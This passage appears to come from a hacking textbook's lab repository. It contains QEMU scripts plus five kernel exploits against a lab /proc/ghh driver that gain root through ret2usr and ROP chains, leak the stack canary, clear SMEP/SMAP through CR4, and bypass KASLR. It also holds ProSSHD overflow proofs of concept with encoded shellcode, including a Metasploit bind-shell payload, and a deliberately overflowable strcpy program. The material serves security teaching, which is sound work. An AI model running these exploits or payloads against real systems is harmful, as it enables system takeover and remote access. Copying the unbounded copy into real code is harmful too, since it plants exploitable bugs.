    -fsdev local,id=fs1,path="$shared",security_model=none \
    -device virtio-9p-pci,fsdev=fs1,mount_tag=host-shared \
    -monitor /dev/null \
    -cpu "$cpu" \
    -s
================================================
FILE: ch12/run4.sh
================================================
#!/bin/sh
# Boot the ch12 lab kernel under QEMU with SMEP and SMAP exposed to the guest
# (-cpu kvm64,smep,smap): kernel mode can neither execute nor access user pages.
# -s opens the gdb stub on tcp:1234; -monitor /dev/null disables the QEMU monitor.
# The 9p share uses security_model=none (no credential mapping, attribute
# failures ignored) - acceptable only for a throwaway lab directory.
qemu=/usr/bin/qemu-system-x86_64
kernel=bzImage
initrd=initramfs.cpio
shared=/home/kali/GHHv6/ch12/shared
cmdline="rw console=ttyS0 nokaslr quiet"
cpu=kvm64,smep,smap

"$qemu" -m 64 -kernel "$kernel" -nographic -append "$cmdline" -initrd "$initrd" \
    -fsdev local,id=fs1,path="$shared",security_model=none \
    -device virtio-9p-pci,fsdev=fs1,mount_tag=host-shared \
    -monitor /dev/null \
    -cpu "$cpu" \
    -s
================================================
FILE: ch12/run5.sh
================================================
#!/bin/sh
# Boot the ch12 lab kernel under QEMU with SMEP and SMAP exposed to the guest
# and, unlike run1-run4, WITHOUT nokaslr on the kernel command line, so the
# kernel's load address is randomized on every boot.
# -s opens the gdb stub on tcp:1234; -monitor /dev/null disables the QEMU monitor.
# The 9p share uses security_model=none (no credential mapping, attribute
# failures ignored) - acceptable only for a throwaway lab directory.
qemu=/usr/bin/qemu-system-x86_64
kernel=bzImage
initrd=initramfs.cpio
shared=/home/kali/GHHv6/ch12/shared
cmdline="rw console=ttyS0 quiet"
cpu=kvm64,smep,smap

"$qemu" -m 64 -kernel "$kernel" -nographic -append "$cmdline" -initrd "$initrd" \
    -fsdev local,id=fs1,path="$shared",security_model=none \
    -device virtio-9p-pci,fsdev=fs1,mount_tag=host-shared \
    -monitor /dev/null \
    -cpu "$cpu" \
    -s
================================================
FILE: ch12/shared/.ash_history
================================================
================================================
FILE: ch12/shared/exploit1/exploit.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
/* User-mode CPU state captured by save_state() and replayed by the iretq in
 * escalate_privileges() so the process resumes cleanly in user mode. */
unsigned long user_cs, user_ss, user_rflags, user_sp;
/* Snapshot the current user-mode cs, ss, rsp and rflags into the globals above.
 * NOTE(review): basic asm() with no operand or clobber list - the compiler is
 * not told these globals are written, so the function is sensitive to
 * optimisation/inlining; confirm the build flags used in the chapter. */
void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
}
/* Resumed here (via user_rip) after the kernel-mode payload returns to user
 * mode: check that the credential change took effect and start a shell;
 * otherwise report the uid and exit. */
void shell(void){
    if (getuid() != 0) {
        printf("UID = %d :-(\n", getuid());
        exit(-1);
    }
    system("/bin/sh");
}
/* Return address pushed for iretq: user mode resumes in shell(). */
unsigned long user_rip = (unsigned long) shell;
/* Kernel-mode payload; main() places its address in the buffer written to
 * /proc/ghh so the lab driver returns into it.  It calls
 * prepare_kernel_cred(0) and commit_creds() at addresses hard-coded for this
 * chapter's bzImage (exploit2 uses different ones for its build; with KASLR,
 * as in run5.sh, fixed addresses are wrong on every boot), then swapgs and an
 * iretq frame built from the save_state() globals return to user mode at
 * user_rip.  Running a user-space function in kernel mode like this is what
 * SMEP (enabled from run3.sh on) blocks.
 * Plain asm() with no clobber list: not meant to be called as a normal C function. */
void escalate_privileges(void){
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "call 0xffffffff81067d80;" // prepare_kernel_cred
        "mov rdi, rax;"
        "call 0xffffffff81067be0;" // commit_creds
        "swapgs;"
        "push user_ss;"
        "push user_sp;"
        "push user_rflags;"
        "push user_cs;"
        "push user_rip;"
        "iretq;"
        ".att_syntax;"
    );
}
/* Lab 1 (stack protector disabled, no SMEP): write 40 zeroed qwords to the
 * lab's vulnerable /proc/ghh handler (the module itself is not in this file)
 * with qword 3 set to escalate_privileges - per the chapter, that slot is the
 * handler's saved return address.  In the stack-protector builds the same
 * write trips the canary check, which is why exploit2 first reads the canary
 * back. */
int main() {
    save_state();
    unsigned long payload[40] = { 0 };
    payload[3] = (unsigned long) escalate_privileges;
    int fd = open("/proc/ghh", O_RDWR);
    if (fd < 0) {
        puts("Failed to open /proc/ghh");
        exit(-1);
    }
    // Return value not checked: the call is expected not to return normally.
    write(fd, payload, sizeof(payload));
    return 0;
}
================================================
FILE: ch12/shared/exploit2/exploit.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
/* User-mode CPU state captured by save_state() and replayed by the iretq in
 * escalate_privileges() so the process resumes cleanly in user mode. */
unsigned long user_cs, user_ss, user_rflags, user_sp;
/* Snapshot the current user-mode cs, ss, rsp and rflags into the globals above.
 * NOTE(review): basic asm() with no operand or clobber list - the compiler is
 * not told these globals are written, so the function is sensitive to
 * optimisation/inlining; confirm the build flags used in the chapter. */
void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
}
/* Resumed here (via user_rip) after the kernel-mode payload returns to user
 * mode: check that the credential change took effect and start a shell;
 * otherwise report the uid and exit. */
void shell(void){
    if (getuid() != 0) {
        printf("UID = %d :-(\n", getuid());
        exit(-1);
    }
    system("/bin/sh");
}
/* Return address pushed for iretq: user mode resumes in shell(). */
unsigned long user_rip = (unsigned long) shell;
/* Kernel-mode payload; main() places its address in the buffer written to
 * /proc/ghh so the lab driver returns into it.  Calls prepare_kernel_cred(0)
 * and commit_creds() at addresses hard-coded for this chapter's
 * stack-protector bzImage (different from exploit1's build; with KASLR, as in
 * run5.sh, fixed addresses are wrong on every boot), then swapgs and an iretq
 * frame built from the save_state() globals return to user mode at user_rip.
 * Running a user-space function in kernel mode like this is what SMEP
 * (enabled from run3.sh on) blocks.
 * Plain asm() with no clobber list: not meant to be called as a normal C function. */
void escalate_privileges(void){
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "call 0xffffffff8106b6a0;" // prepare_kernel_cred
        "mov rdi, rax;"
        "call 0xffffffff8106b500;" // commit_creds
        "swapgs;"
        "push user_ss;"
        "push user_sp;"
        "push user_rflags;"
        "push user_cs;"
        "push user_rip;"
        "iretq;"
        ".att_syntax;"
    );
}
/* Lab 2 (stack protector enabled, no SMEP): the driver's read handler leaks
 * 5 qwords of its own stack, the second of which is the canary; the write
 * then places that canary back in slot 1 so the check passes, and puts
 * escalate_privileges in slot 4 (the saved return address, per the chapter).
 * The canary only protects against blind overwrites - an info leak like this
 * read path neutralises it, which is the chapter's lesson. */
int main() {
    save_state();
    int fd = open("/proc/ghh", O_RDWR);
    if (fd < 0) {
        puts("Failed to open /proc/ghh");
        exit(-1);
    }
    unsigned long leak[5];;  /* stray second ';' is an empty statement */
    read(fd, leak, sizeof(leak));  /* return value not checked */
    unsigned long canary = leak[1];
    printf("Canary = 0x%016lx\n", canary);
    unsigned long payload[40] = { 0 };
    payload[1] = canary;
    payload[4] = (unsigned long) escalate_privileges;
    write(fd, payload, sizeof(payload));  /* expected not to return normally */
    return 0;
}
================================================
FILE: ch12/shared/exploit3/exploit.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
/* User-mode CPU state captured by save_state(); main() places these values in
 * the iretq frame at the end of its chain so the process resumes in user mode. */
unsigned long user_cs, user_ss, user_rflags, user_sp;
/* Snapshot the current user-mode cs, ss, rsp and rflags into the globals above.
 * NOTE(review): basic asm() with no operand or clobber list - the compiler is
 * not told these globals are written, so the function is sensitive to
 * optimisation/inlining; confirm the build flags used in the chapter. */
void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
}
/* Resumed here (via user_rip) after the kernel-mode chain returns to user
 * mode: check that the credential change took effect and start a shell;
 * otherwise report the uid and exit. */
void shell(void){
    if (getuid() != 0) {
        printf("UID = %d :-(\n", getuid());
        exit(-1);
    }
    system("/bin/sh");
}
/* Return address placed in the iretq frame: user mode resumes in shell(). */
unsigned long user_rip = (unsigned long) shell;
/* Lab 3 (stack protector + SMEP, see run3.sh): no user-space function is
 * executed in kernel mode any more - the return slot and everything after it
 * is a chain of addresses inside the kernel image itself (gadgets plus
 * prepare_kernel_cred/commit_creds), ending in an iretq frame built from the
 * save_state() globals.  All addresses are fixed for this chapter's bzImage;
 * KASLR (run5.sh) makes them wrong on every boot.  The canary is recovered
 * from the driver's read handler exactly as in exploit2. */
int main() {
    save_state();
    int fd = open("/proc/ghh", O_RDWR);
    if (fd < 0) {
        puts("Failed to open /proc/ghh");
        exit(-1);
    }
    unsigned long leak[5];;  /* stray second ';' is an empty statement */
    read(fd, leak, sizeof(leak));  /* return value not checked */
    unsigned long canary = leak[1];
    printf("Canary = 0x%016lx\n", canary);
    unsigned long payload[40] = { 0 };
    payload[1] = canary;
    int i = 4;  /* slot 4 is the saved return address, per the chapter */
    payload[i++] = 0xffffffff811ad2ec; // pop rdi; ret;
    payload[i++] = 0;
    payload[i++] = 0xffffffff8106b6a0; // prepare_kernel_cred
    payload[i++] = 0xffffffff8100534f; // mov r8, rax; mov rax, r8; ret;
    payload[i++] = 0xffffffff81113e1b; // mov rdx, r8; ret;
    payload[i++] = 0xffffffff811b794e; // mov rdi, rax; cmp rdi, rdx; jne 0x3b7945; xor eax, eax; ret;
    payload[i++] = 0xffffffff8106b500; // commit_creds
    payload[i++] = 0xffffffff81400cc6; // common_interrupt_return+22: mov rdi,rsp
    payload[i++] = 0;
    payload[i++] = 0;
    /* iretq frame consumed by the kernel's own return path: rip, cs, rflags, rsp, ss. */
    payload[i++] = user_rip;
    payload[i++] = user_cs;
    payload[i++] = user_rflags;
    payload[i++] = user_sp;
    payload[i++] = user_ss;
    write(fd, payload, sizeof(payload));  /* expected not to return normally */
    return 0;
}
================================================
FILE: ch12/shared/exploit4/exploit.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
/* User-mode CPU state captured by save_state(); main() places these values in
 * the iretq frame at the end of its chain so the process resumes in user mode. */
unsigned long user_cs, user_ss, user_rflags, user_sp;
/* Snapshot the current user-mode cs, ss, rsp and rflags into the globals above.
 * NOTE(review): basic asm() with no operand or clobber list - the compiler is
 * not told these globals are written, so the function is sensitive to
 * optimisation/inlining; confirm the build flags used in the chapter. */
void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
}
/* Resumed here (via user_rip) after the kernel-mode chain returns to user
 * mode: check that the credential change took effect and start a shell;
 * otherwise report the uid and exit. */
void shell(void){
    if (getuid() != 0) {
        printf("UID = %d :-(\n", getuid());
        exit(-1);
    }
    system("/bin/sh");
}
/* Return address placed in the iretq frame: user mode resumes in shell(). */
unsigned long user_rip = (unsigned long) shell;
/* Lab 4 (stack protector + SMEP + SMAP, see run4.sh).  The 40-qword write
 * only has room for a short chain, so it does two things: writes 0x6B0 to
 * CR4 (a value with the SMEP and SMAP bits clear, so kernel mode may again
 * touch user pages) and then moves the stack pointer to 0xc0d30000, a
 * user-space page this program maps beforehand and fills with the same
 * credential chain and iretq frame as exploit3.  All kernel addresses are
 * fixed for this chapter's bzImage.  Newer kernels pin the CR4 security bits
 * and restore them if they are cleared, which is the mitigation for exactly
 * this step; KASLR (run5.sh) is what breaks the fixed addresses. */
int main() {
    save_state();
    int fd = open("/proc/ghh", O_RDWR);
    if (fd < 0) {
        puts("Failed to open /proc/ghh");
        exit(-1);
    }
    unsigned long leak[5];;  /* stray second ';' is an empty statement */
    read(fd, leak, sizeof(leak));  /* return value not checked */
    unsigned long canary = leak[1];
    printf("Canary = 0x%016lx\n", canary);
    unsigned long payload[40] = { 0 };
    payload[1] = canary;
    int i = 4;  /* slot 4 is the saved return address, per the chapter */
    payload[i++] = 0xffffffff811ad2ec; // pop rdi; ret;
    payload[i++] = 0x6B0;
    payload[i++] = 0xffffffff811c3843; // mov cr4, rdi; mov r12, r15; ret 8;
    payload[i++] = 0xffffffff81022d82; // ret
    payload[i++] = 0xffffffff81022d82; // ret
    payload[i++] = 0xffffffff81022d81; // pop rax; ret;
    payload[i++] = 0xc0d30000; // fake_stack
    payload[i++] = 0xffffffff81265330; // mov esp, eax; mov rax, r12; pop r12; pop rbp; ret;
    // Fake Stack
    // Two pages are mapped starting one page below 0xc0d30000 so that the
    // 'pop r12; pop rbp' above and the chain itself both land inside the
    // mapping; index 512 (512 * 8 bytes) is exactly 0xc0d30000.
    unsigned long *fake_stack = mmap((void *) (0xc0d30000 - 0x1000), 0x2000,
        PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
    if (fake_stack == MAP_FAILED) {
        perror("mmap");
        exit(-1);
    }
    fake_stack[0] = 0xdeadbeefdeadbeef;
    i = 512;
    fake_stack[i++] = 0xdeadbeefdeadbeef;  /* consumed by pop r12 */
    fake_stack[i++] = 0xdeadbeefdeadbeef;  /* consumed by pop rbp */
    fake_stack[i++] = 0xffffffff811ad2ec; // pop rdi; ret;
    fake_stack[i++] = 0;
    fake_stack[i++] = 0xffffffff8106b6a0; // prepare_kernel_cred
    fake_stack[i++] = 0xffffffff8100534f; // mov r8, rax; mov rax, r8; ret;
    fake_stack[i++] = 0xffffffff81113e1b; // mov rdx, r8; ret;
    fake_stack[i++] = 0xffffffff811b794e; // mov rdi, rax; cmp rdi, rdx; jne 0x3b7945; xor eax, eax; ret;
    fake_stack[i++] = 0xffffffff8106b500; // commit_creds
    fake_stack[i++] = 0xffffffff81400cc6; // common_interrupt_return+22: mov rdi,rsp
    fake_stack[i++] = 0;
    fake_stack[i++] = 0;
    /* iretq frame consumed by the kernel's own return path: rip, cs, rflags, rsp, ss. */
    fake_stack[i++] = user_rip;
    fake_stack[i++] = user_cs;
    fake_stack[i++] = user_rflags;
    fake_stack[i++] = user_sp;
    fake_stack[i++] = user_ss;
    write(fd, payload, sizeof(payload));  /* expected not to return normally */
    return 0;
}
================================================
FILE: ch12/shared/exploit5/exploit.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
/* User-mode CPU state captured by save_state(); main() places these values in
 * the iretq frame at the end of its chain so the process resumes in user mode. */
unsigned long user_cs, user_ss, user_rflags, user_sp;
/* Snapshot the current user-mode cs, ss, rsp and rflags into the globals above.
 * NOTE(review): basic asm() with no operand or clobber list - the compiler is
 * not told these globals are written, so the function is sensitive to
 * optimisation/inlining; confirm the build flags used in the chapter. */
void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
}
/* Resumed here (via user_rip) after the kernel-mode chain returns to user
 * mode: check that the credential change took effect and start a shell;
 * otherwise report the uid and exit. */
void shell(void){
    if (getuid() != 0) {
        printf("UID = %d :-(\n", getuid());
        exit(-1);
    }
    system("/bin/sh");
}
/* Return address placed in the iretq frame: user mode resumes in shell(). */
unsigned long user_rip = (unsigned long) shell;
/* Lab 5 (stack protector + SMEP + SMAP + KASLR, see run5.sh).  Same chain as
 * exploit4, but every kernel address is now kernel_base plus a fixed offset,
 * where kernel_base is derived from the fifth qword the driver's read handler
 * leaks (a kernel text pointer at offset 0x14c174 in this build).  This is why
 * KASLR on its own is only as strong as the kernel's resistance to pointer
 * leaks - the mitigation here is closing the leak (and CR4 pinning for the
 * SMEP/SMAP step), not randomisation alone. */
int main() {
    save_state();
    int fd = open("/proc/ghh", O_RDWR);
    if (fd < 0) {
        puts("Failed to open /proc/ghh");
        exit(-1);
    }
    unsigned long leak[5];;  /* stray second ';' is an empty statement */
    read(fd, leak, sizeof(leak));  /* return value not checked */
    unsigned long canary = leak[1];
    unsigned long kernel_base = leak[4] - 0x14c174;  /* offset specific to this bzImage */
    printf("Kernel Base = 0x%016lx\n", kernel_base);
    printf("Canary = 0x%016lx\n", canary);
    unsigned long payload[40] = { 0 };
    payload[1] = canary;
    int i = 4;  /* slot 4 is the saved return address, per the chapter */
    payload[i++] = kernel_base + 0x1ad2ec; // pop rdi; ret;
    payload[i++] = 0x6B0;  /* CR4 value with the SMEP and SMAP bits clear */
    payload[i++] = kernel_base + 0x1c3843; // mov cr4, rdi; mov r12, r15; ret 8;
    payload[i++] = kernel_base + 0x22d82; // ret
    payload[i++] = kernel_base + 0x22d82; // ret
    payload[i++] = kernel_base + 0x22d81; // pop rax; ret;
    payload[i++] = 0xc0d30000;  /* address of the user-space fake stack mapped below */
    payload[i++] = kernel_base + 0x265330; // mov esp, eax; mov rax, r12; pop r12; pop rbp; ret;
    // Fake Stack
    // Two pages from one page below 0xc0d30000; index 512 (512 * 8) is 0xc0d30000.
    unsigned long *fake_stack = mmap((void *) (0xc0d30000 - 0x1000), 0x2000,
        PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
    if (fake_stack == MAP_FAILED) {
        perror("mmap");
        exit(-1);
    }
    fake_stack[0] = 0xdeadbeefdeadbeef;
    i = 512;
    fake_stack[i++] = 0xdeadbeefdeadbeef;  /* consumed by pop r12 */
    fake_stack[i++] = 0xdeadbeefdeadbeef;  /* consumed by pop rbp */
    fake_stack[i++] = kernel_base + 0x1ad2ec; // pop rdi; ret;
    fake_stack[i++] = 0;
    fake_stack[i++] = kernel_base + 0x6b6a0; // prepare_kernel_cred
    fake_stack[i++] = kernel_base + 0x534f; // mov r8, rax; mov rax, r8; ret;
    fake_stack[i++] = kernel_base + 0x113e1b; // mov rdx, r8; ret;
    fake_stack[i++] = kernel_base + 0x1b794e; // mov rdi, rax; cmp rdi, rdx; jne 0x3b7945; xor eax, eax; ret;
    fake_stack[i++] = kernel_base + 0x6b500; // commit_creds
    fake_stack[i++] = kernel_base + 0x400cc6; // common_interrupt_return+22: mov rdi,rsp
    fake_stack[i++] = 0;
    fake_stack[i++] = 0;
    /* iretq frame consumed by the kernel's own return path: rip, cs, rflags, rsp, ss. */
    fake_stack[i++] = user_rip;
    fake_stack[i++] = user_cs;
    fake_stack[i++] = user_rflags;
    fake_stack[i++] = user_sp;
    fake_stack[i++] = user_ss;
    write(fd, payload, sizeof(payload));  /* expected not to return normally */
    return 0;
}
================================================
FILE: ch12/shared/leak.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
/* Probe for the ch12 lab driver: dumps the 5 qwords its read handler leaks
 * from the kernel stack, then writes 40 qwords with slot 4 set to a
 * recognisable marker - presumably to confirm in the debugger (run*.sh -s)
 * which slot ends up in the return address.  The leaked values are exactly
 * the kind of kernel stack disclosure that defeats canaries and KASLR in the
 * later labs; the fix belongs in the driver (bounded copies, no raw stack
 * reads). */
int main() {
    int fd = open("/proc/ghh", O_RDWR);
    if (fd < 0) {
        puts("Failed to open /proc/ghh");
        exit(-1);
    }
    unsigned long leak[5];;  /* stray second ';' is an empty statement */
    read(fd, leak, sizeof(leak));  /* return value not checked */
    for (int i=0; i < 5; i++)
        printf("0x%016lx\n", leak[i]);
    unsigned long payload[40] = { 0 };
    payload[4] = 0xdeadbeefdeadbeef;
    write(fd, payload, sizeof(payload));  /* expected to crash the kernel's handler */
    return 0;
}
================================================
FILE: ch12/stackprotector-disabled/vmlinux
================================================
[File too large to display: 18.7 MB]
================================================
FILE: ch12/vmlinux
================================================
[File too large to display: 18.8 MB]
================================================
FILE: ch13/hello.c
================================================
#include <stdio.h>
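/* Minimal program for the ch13 debugger exercises.
 * Explicit `int main(void)`: the original relied on implicit int, which
 * C99 and later compilers reject.  Output is unchanged (no trailing newline). */
int main(void) {
    printf("Hello Haxor");
    return 0;
}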
================================================
FILE: ch13/meet.c
================================================
#include <stdio.h>
#include <string.h>
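/* Greets the user: copies temp2 into a fixed 400-byte stack buffer and prints it.
 * temp1: title, printed as-is.  temp2: name, copied with strcpy().
 * strcpy() performs no bounds check, so a temp2 of 400 bytes or more runs past
 * name[] into the saved frame - this is the chapter's intentional bug (a bounded
 * copy such as snprintf(name, sizeof name, "%s", temp2) would prevent it); the
 * body is kept byte-for-byte so the lab's stack layout is unchanged.
 * Declared void (was implicit int, rejected by C99+ compilers) to match ch10/meet.c. */
void greeting(char *temp1, char *temp2) {
    char name[400];
    strcpy(name, temp2);
    printf("Hello %s %s\n", temp1, name);
}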
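/* Entry point: argv[1] is the title, argv[2] the name.
 * Explicit `int` return type (the original relied on implicit int, rejected by
 * C99+ compilers) and an argc check so that running without both arguments
 * reports usage instead of dereferencing a NULL argv entry.  Returns 0 on
 * success, 1 on a usage error. */
int main(int argc, char *argv[]) {
    if (argc < 3) {
        fprintf(stderr, "Usage: %s <title> <name>\n", argc > 0 ? argv[0] : "meet");
        return 1;
    }
    greeting(argv[1], argv[2]);
    printf("Bye %s %s\n", argv[1], argv[2]);
    return 0;
}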
================================================
FILE: ch13/prosshd1.py
================================================
#prosshd3.py POC Exploit
# Crash-reproduction step for the ProSSHD lab: log in over SSH and issue an
# SCP request whose remote-path string is 500 'A's, to observe how the
# service handles an over-long path.  The host and credentials are the lab
# VM's; they must not be replaced with real ones in a committed script.
import paramiko
from scp import *
from contextlib import closing  # unused here
from time import sleep
import struct                   # unused here
hostname = "192.168.209.198"
username = "test1"
password = "asdf"
req = "A" * 500  # NOTE(review): str here, bytes in prosshd3.py - confirm which the library expects
ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()  # only keys already in known_hosts; an unknown host key is rejected
ssh_client.connect(hostname, username=username, key_filename=None,
password=password)
sleep(15)  # gives time to attach a debugger to the service before the request goes out
# NOTE(review): the first argument to put() is the client object itself, not
# a local file path - looks like a copy/paste slip, but the remote-path string
# is what carries the test input; confirm against the chapter before changing.
with SCPClient(ssh_client.get_transport()) as scp:
    scp.put(scp, req)
================================================
FILE: ch13/prosshd2.py
================================================
#prosshd3.py POC Exploit
# Second step of the ProSSHD lab: same request as prosshd1.py, but the last
# four bytes of the 496-byte path are "BBBB" so that, if the crash is a
# return-address overwrite, the distinctive value shows in the debugger.
# Lab host and credentials only.
import paramiko
from scp import *
from contextlib import closing  # unused here
from time import sleep
import struct                   # unused here
hostname = "192.168.209.198"
username = "test1"
password = "asdf"
req = "A" * 492 + "BBBB"  # NOTE(review): str here, bytes in prosshd3.py - confirm which the library expects
ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()  # only keys already in known_hosts; an unknown host key is rejected
ssh_client.connect(hostname, username=username, key_filename=None,
password=password)
sleep(15)  # gives time to attach a debugger to the service before the request goes out
# NOTE(review): the first argument to put() is the client object itself, not
# a local file path - looks like a copy/paste slip, but the remote-path string
# is what carries the test input; confirm against the chapter before changing.
with SCPClient(ssh_client.get_transport()) as scp:
    scp.put(scp, req)
================================================
FILE: ch13/prosshd3.py
================================================
#prosshd3.py POC Exploit
# Third step of the ProSSHD lab: the 492-byte filler is followed by a fixed
# 32-bit address (`jmp`, a location chosen in the chapter), 12 NOP bytes and
# an encoded payload (`sc`).  The address is only valid for the lab's exact
# Windows/DLL versions - per-module ASLR is the defence that invalidates such
# fixed addresses, and DEP blocks running the bytes (see prosshd_dep.py).
# Lab host and credentials only.
import paramiko
from scp import *
from contextlib import closing  # unused here
from time import sleep
import struct
hostname = "192.168.209.198"
username = "test1"
password = "asdf"
jmp = struct.pack('<L', 0x7c345c30)  # little-endian 32-bit address from the chapter
pad = b"\x90" * 12
sc = b""
sc += b"\xb8\x7f\x28\xcf\xda\xdb\xda\xd9\x74\x24\xf4\x5d\x33"
sc += b"\xc9\xb1\x31\x83\xc5\x04\x31\x45\x0f\x03\x45\x70\xca"
sc += b"\x3a\x26\x66\x88\xc5\xd7\x76\xed\x4c\x32\x47\x2d\x2a"
sc += b"\x36\xf7\x9d\x38\x1a\xfb\x56\x6c\x8f\x88\x1b\xb9\xa0"
sc += b"\x39\x91\x9f\x8f\xba\x8a\xdc\x8e\x38\xd1\x30\x71\x01"
sc += b"\x1a\x45\x70\x46\x47\xa4\x20\x1f\x03\x1b\xd5\x14\x59"
sc += b"\xa0\x5e\x66\x4f\xa0\x83\x3e\x6e\x81\x15\x35\x29\x01"
sc += b"\x97\x9a\x41\x08\x8f\xff\x6c\xc2\x24\xcb\x1b\xd5\xec"
sc += b"\x02\xe3\x7a\xd1\xab\x16\x82\x15\x0b\xc9\xf1\x6f\x68"
sc += b"\x74\x02\xb4\x13\xa2\x87\x2f\xb3\x21\x3f\x94\x42\xe5"
sc += b"\xa6\x5f\x48\x42\xac\x38\x4c\x55\x61\x33\x68\xde\x84"
sc += b"\x94\xf9\xa4\xa2\x30\xa2\x7f\xca\x61\x0e\xd1\xf3\x72"
sc += b"\xf1\x8e\x51\xf8\x1f\xda\xeb\xa3\x75\x1d\x79\xde\x3b"
sc += b"\x1d\x81\xe1\x6b\x76\xb0\x6a\xe4\x01\x4d\xb9\x41\xfd"
sc += b"\x07\xe0\xe3\x96\xc1\x70\xb6\xfa\xf1\xae\xf4\x02\x72"
sc += b"\x5b\x84\xf0\x6a\x2e\x81\xbd\x2c\xc2\xfb\xae\xd8\xe4"
sc += b"\xa8\xcf\xc8\x86\x2f\x5c\x90\x66\xca\xe4\x33\x77"
req = b"A" * 492 + jmp + pad + sc
ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()  # only keys already in known_hosts; an unknown host key is rejected
ssh_client.connect(hostname, username=username, key_filename=None,
password=password)
sleep(20)  # gives time to attach a debugger to the service before the request goes out
# sanitize=lambda x:x turns off the library's remote-path escaping so the raw
# bytes are sent unchanged.  NOTE(review): the first argument to put() is the
# client object itself, not a local file path - looks like a copy/paste slip,
# but the remote-path string is what carries the input; confirm against the
# chapter before changing.
with SCPClient(ssh_client.get_transport(), sanitize=lambda x:x) as scp:
    scp.put(scp, req)
================================================
FILE: ch13/prosshd_dep.py
================================================
#prosshd_dep.py
import paramiko
from scp import *
from contextlib import closing
from time import sleep
import struct
# Lab host and credentials used by this PoC (fixed lab values, not discovered).
hostname = "192.168.209.198"
username = "test1"
password = "asdf"
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process,
# Encoded payload exactly as generated by the tool above; opaque from here.
sc = b""
sc += b"\xdd\xc1\xd9\x74\x24\xf4\xbb\xc4\xaa\x69\x8a\x58\x33\xc9\xb1"
sc += b"\x56\x83\xe8\xfc\x31\x58\x14\x03\x58\xd0\x48\x9c\x76\x30\x05"
sc += b"\x5f\x87\xc0\x76\xe9\x62\xf1\xa4\x8d\xe7\xa3\x78\xc5\xaa\x4f"
sc += b"\xf2\x8b\x5e\xc4\x76\x04\x50\x6d\x3c\x72\x5f\x6e\xf0\xba\x33"
sc += b"\xac\x92\x46\x4e\xe0\x74\x76\x81\xf5\x75\xbf\xfc\xf5\x24\x68"
sc += b"\x8a\xa7\xd8\x1d\xce\x7b\xd8\xf1\x44\xc3\xa2\x74\x9a\xb7\x18"
sc += b"\x76\xcb\x67\x16\x30\xf3\x0c\x70\xe1\x02\xc1\x62\xdd\x4d\x6e"
sc += b"\x50\x95\x4f\xa6\xa8\x56\x7e\x86\x67\x69\x4e\x0b\x79\xad\x69"
sc += b"\xf3\x0c\xc5\x89\x8e\x16\x1e\xf3\x54\x92\x83\x53\x1f\x04\x60"
sc += b"\x65\xcc\xd3\xe3\x69\xb9\x90\xac\x6d\x3c\x74\xc7\x8a\xb5\x7b"
sc += b"\x08\x1b\x8d\x5f\x8c\x47\x56\xc1\x95\x2d\x39\xfe\xc6\x8a\xe6"
sc += b"\x5a\x8c\x39\xf3\xdd\xcf\x55\x30\xd0\xef\xa5\x5e\x63\x83\x97"
sc += b"\xc1\xdf\x0b\x94\x8a\xf9\xcc\xdb\xa1\xbe\x43\x22\x49\xbf\x4a"
sc += b"\xe1\x1d\xef\xe4\xc0\x1d\x64\xf5\xed\xc8\x2b\xa5\x41\xa2\x8b"
sc += b"\x15\x22\x12\x64\x7c\xad\x4d\x94\x7f\x67\xf8\x92\xb1\x53\xa9"
sc += b"\x74\xb0\x63\x37\xec\x3d\x85\xad\xfe\x6b\x1d\x59\x3d\x48\x96"
sc += b"\xfe\x3e\xba\x8a\x57\xa9\xf2\xc4\x6f\xd6\x02\xc3\xdc\x7b\xaa"
sc += b"\x84\x96\x97\x6f\xb4\xa9\xbd\xc7\xbf\x92\x56\x9d\xd1\x51\xc6"
sc += b"\xa2\xfb\x01\x6b\x30\x60\xd1\xe2\x29\x3f\x86\xa3\x9c\x36\x42"
sc += b"\x5e\x86\xe0\x70\xa3\x5e\xca\x30\x78\xa3\xd5\xb9\x0d\x9f\xf1"
sc += b"\xa9\xcb\x20\xbe\x9d\x83\x76\x68\x4b\x62\x21\xda\x25\x3c\x9e"
sc += b"\xb4\xa1\xb9\xec\x06\xb7\xc5\x38\xf1\x57\x77\x95\x44\x68\xb8"
